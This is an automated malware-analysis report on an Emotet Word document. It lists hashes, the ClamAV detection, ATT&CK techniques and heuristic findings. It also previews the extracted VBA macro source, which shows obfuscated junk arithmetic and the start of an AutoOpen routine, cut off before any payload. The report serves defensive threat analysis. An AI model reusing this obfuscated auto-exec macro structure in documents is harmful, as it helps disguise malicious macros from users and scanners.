Emotet Office (OLE) malware analysis — malicious · 29523b92e42dcb55

MALICIOUS

Office (OLE)

184.0 KB Created: 2019-03-27 08:49:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: 574171a94dce0308ebf86da8b94b7cf2 SHA-1: a291382350c16c59944225caecb102da0e49b4f5 SHA-256: 29523b92e42dcb55a4fb75221a797471a76f5ff547f86b4838bfc69f6c6dbd5f

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6914192-0. Static analysis revealed the presence of a VBA macro with an AutoOpen function, which is a common characteristic of Emotet. The macro utilizes GetObject, indicating an attempt to execute code. The embedded URL, though benign, is noted as present in the document text.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6914192-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6914192-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31859 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	31859 bytes
SHA-256: `0ae21cf4488201fbccd6d930e16020ddfdc4558ca2b256749b29a91d9749b70c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "UC4ZxDD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Ck_DA4UA" Attribute VB_Base = "0{486C1C95-0114-43F9-BD7C-0A6F50B65828}{535DEF30-7F36-4602-84F6-AB35C783844B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "cD1CQA" Attribute VB_Base = "0{8B388202-1CBF-4E0E-AA5F-95EA4473B22A}{563E4B2C-A753-4250-B77E-DB3624B9FC62}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "wxoAAwBA" Function dA_ZwAA() If fADw4AQ_ = iXcADQ Then Gx1BAC = CGUAAQ _ - Int(852978923) / OADADkC - _ Fix(uXXQUAA + _ CBool(676839128) - W1UBDDo * Sin(801683744)) + (696524819 + _ CDate(26256593 / 712161871 + 490858321 * Rnd(778094165))) + IoZCQ1BZ / _ Sgn(B_X_1o + Log(959105222) / CDQXUQX_ * 274701611) End If If MwAB1BC = jA1DA1X Then BQZBkD = EUBcUDD _ - CStr(897261986) / ZAADAkAD - _ CByte(cwAcXQxG + _ CByte(549917611) - nB14AAAU * Sqr(145948092)) + (260561931 + _ Hex(324551243 / 888550157 + 686435559 * CLng(441916773))) + rUDB4BUo / _ Round(CUADDQ + Tan(525451066) / HDAUcU * 646851334) End If If bwkUA1 = DQABUA1 Then bDxAZoo = FQxDA4D _ - Atn(903257900) / OAZwkZCx - _ CDbl(q_oAB_A + _ CBool(331692801) - RXQ4UcX * Cos(18440044)) + (749279719 + _ Sqr(755450797 / 269047628 + 363032363 * Rnd(785793492))) + vooA_U / _ Oct(AAZoxAA + Rnd(319636971) / ocAAUAo * 723234855) End If If vUcXxC = QkxXxAok Then tk1XGCoG = wUAAoAc _ - CBool(744026654) / KUADQ_Ax - _ Fix(nAAAcU + _ CByte(46840756) - qCxAU4 * CSng(291481056)) + (161365022 + _ Rnd(389649248 / 69415681 + 43991813 * Atn(746346236))) + G_BAUk / _ Atn(ZkA1cUk + Sgn(377489796) / IAoAAA * 656231566) End If If VABUo4 = FAADB1C Then BcB4Zo = UAACUAA _ - Oct(278103709) / fUXwAQZ - _ Round(hZGkAQ + _ Oct(281597973) - JBD_oxAU * CSng(173964592)) + (545219200 + _ Oct(61743133 / 426133930 + 320640231 * Oct(846680798))) + qx1oAAw / _ Fix(NZAQAD + CByte(350652834) / PkD1AQD * 427483443) End If If kQD4cco = DBZBUG Then kA4AAXAQ = lAQDkcAU _ - Oct(334075801) / YB1cAB - _ CDbl(i4U4AQ + _ Sgn(559199464) - CBAAx1U * Cos(508288067)) + (419044801 + _ CBool(132312033 / 636310124 + 882210694 * Round(793385188))) + H1oDcGA / _ Hex(iAQACUBQ + Hex(421360485) / JkAxA_cB * 981294150) End If If jwUZAA = sDGDxDB Then uxcoBA = IQCQQDD _ - CStr(905177671) / QAUDAC - _ Sin(LABAAc + _ Fix(487728351) - rCDoAU * Sgn(967557542)) + (59331575 + _ Tan(301502246 / 735441792 + 109804044 * Tan(601666544))) + aCAAC_ / _ CDbl(jwXAUoBA + Oct(281045288) / FGAcAA * 891270297) End If If m4CU4A = VAGDZA Then CBXABA_x = DBAZUAG _ - Sgn(206888878) / VUAAkw - _ CInt(MB_CQA + _ CDbl(9996470) - HAxABQX * Sqr(27965514)) + (591812421 + _ Atn(871907380 / 109742170 + 215169555 * Oct(628016639))) + S_kwAA / _ CInt(tCDoAxQ + Sgn(386114667) / aAA1Xx * 559535366) End If End Function Sub autoopen() On Error Resume Next If VUAAAQZA = lAABQUD Then ZZDAAD1A = PBADGAQA _ - Hex(206149849) / uoA44G4A - _ Rnd(PBAAoAU + _ Sin(95833808) - aAUUcAc * Sgn(881185195)) + (958884156 + _ CInt(749386780 / 622464135 + 485271367 * Sqr(457917020))) + qACAxAZ / _ CInt(zQAUwAD + CDate(225284472) / JAX44kDA * 568488764) End If If t_AxDZA = nBABAAA Then aDBAAQ = qAoUBAA1 _ - Int(318435538) / s1DUAAC - _ Rnd(CoCAxUQ + _ Cos(740480803) - FGCQUX * Atn(128140215)) + (251078722 + _ Sgn(602757931 / 75540632 + 766342090 * Hex(221962883))) + MBBAUUA / _ CBool(HUQABc + CStr(756839905) / fXUAUx * 786446774) End If If HAAAABA ... (truncated)

SHA-256: 0ae21cf4488201fbccd6d930e16020ddfdc4558ca2b256749b29a91d9749b70c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "UC4ZxDD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Ck_DA4UA"
Attribute VB_Base = "0{486C1C95-0114-43F9-BD7C-0A6F50B65828}{535DEF30-7F36-4602-84F6-AB35C783844B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "cD1CQA"
Attribute VB_Base = "0{8B388202-1CBF-4E0E-AA5F-95EA4473B22A}{563E4B2C-A753-4250-B77E-DB3624B9FC62}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wxoAAwBA"
Function dA_ZwAA()
   If fADw4AQ_ = iXcADQ Then
      Gx1BAC = CGUAAQ _
- Int(852978923) / OADADkC - _
Fix(uXXQUAA + _
CBool(676839128) - W1UBDDo * Sin(801683744)) + (696524819 + _
CDate(26256593 / 712161871 + 490858321 * Rnd(778094165))) + IoZCQ1BZ / _
Sgn(B_X_1o + Log(959105222) / CDQXUQX_ * 274701611)
End If
   If MwAB1BC = jA1DA1X Then
      BQZBkD = EUBcUDD _
- CStr(897261986) / ZAADAkAD - _
CByte(cwAcXQxG + _
CByte(549917611) - nB14AAAU * Sqr(145948092)) + (260561931 + _
Hex(324551243 / 888550157 + 686435559 * CLng(441916773))) + rUDB4BUo / _
Round(CUADDQ + Tan(525451066) / HDAUcU * 646851334)
End If
   If bwkUA1 = DQABUA1 Then
      bDxAZoo = FQxDA4D _
- Atn(903257900) / OAZwkZCx - _
CDbl(q_oAB_A + _
CBool(331692801) - RXQ4UcX * Cos(18440044)) + (749279719 + _
Sqr(755450797 / 269047628 + 363032363 * Rnd(785793492))) + vooA_U / _
Oct(AAZoxAA + Rnd(319636971) / ocAAUAo * 723234855)
End If
   If vUcXxC = QkxXxAok Then
      tk1XGCoG = wUAAoAc _
- CBool(744026654) / KUADQ_Ax - _
Fix(nAAAcU + _
CByte(46840756) - qCxAU4 * CSng(291481056)) + (161365022 + _
Rnd(389649248 / 69415681 + 43991813 * Atn(746346236))) + G_BAUk / _
Atn(ZkA1cUk + Sgn(377489796) / IAoAAA * 656231566)
End If
   If VABUo4 = FAADB1C Then
      BcB4Zo = UAACUAA _
- Oct(278103709) / fUXwAQZ - _
Round(hZGkAQ + _
Oct(281597973) - JBD_oxAU * CSng(173964592)) + (545219200 + _
Oct(61743133 / 426133930 + 320640231 * Oct(846680798))) + qx1oAAw / _
Fix(NZAQAD + CByte(350652834) / PkD1AQD * 427483443)
End If
   If kQD4cco = DBZBUG Then
      kA4AAXAQ = lAQDkcAU _
- Oct(334075801) / YB1cAB - _
CDbl(i4U4AQ + _
Sgn(559199464) - CBAAx1U * Cos(508288067)) + (419044801 + _
CBool(132312033 / 636310124 + 882210694 * Round(793385188))) + H1oDcGA / _
Hex(iAQACUBQ + Hex(421360485) / JkAxA_cB * 981294150)
End If
   If jwUZAA = sDGDxDB Then
      uxcoBA = IQCQQDD _
- CStr(905177671) / QAUDAC - _
Sin(LABAAc + _
Fix(487728351) - rCDoAU * Sgn(967557542)) + (59331575 + _
Tan(301502246 / 735441792 + 109804044 * Tan(601666544))) + aCAAC_ / _
CDbl(jwXAUoBA + Oct(281045288) / FGAcAA * 891270297)
End If
   If m4CU4A = VAGDZA Then
      CBXABA_x = DBAZUAG _
- Sgn(206888878) / VUAAkw - _
CInt(MB_CQA + _
CDbl(9996470) - HAxABQX * Sqr(27965514)) + (591812421 + _
Atn(871907380 / 109742170 + 215169555 * Oct(628016639))) + S_kwAA / _
CInt(tCDoAxQ + Sgn(386114667) / aAA1Xx * 559535366)
End If
End Function
Sub autoopen()
On Error Resume Next
   If VUAAAQZA = lAABQUD Then
      ZZDAAD1A = PBADGAQA _
- Hex(206149849) / uoA44G4A - _
Rnd(PBAAoAU + _
Sin(95833808) - aAUUcAc * Sgn(881185195)) + (958884156 + _
CInt(749386780 / 622464135 + 485271367 * Sqr(457917020))) + qACAxAZ / _
CInt(zQAUwAD + CDate(225284472) / JAX44kDA * 568488764)
End If
   If t_AxDZA = nBABAAA Then
      aDBAAQ = qAoUBAA1 _
- Int(318435538) / s1DUAAC - _
Rnd(CoCAxUQ + _
Cos(740480803) - FGCQUX * Atn(128140215)) + (251078722 + _
Sgn(602757931 / 75540632 + 766342090 * Hex(221962883))) + MBBAUUA / _
CBool(HUQABc + CStr(756839905) / fXUAUx * 786446774)
End If
   If HAAAABA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.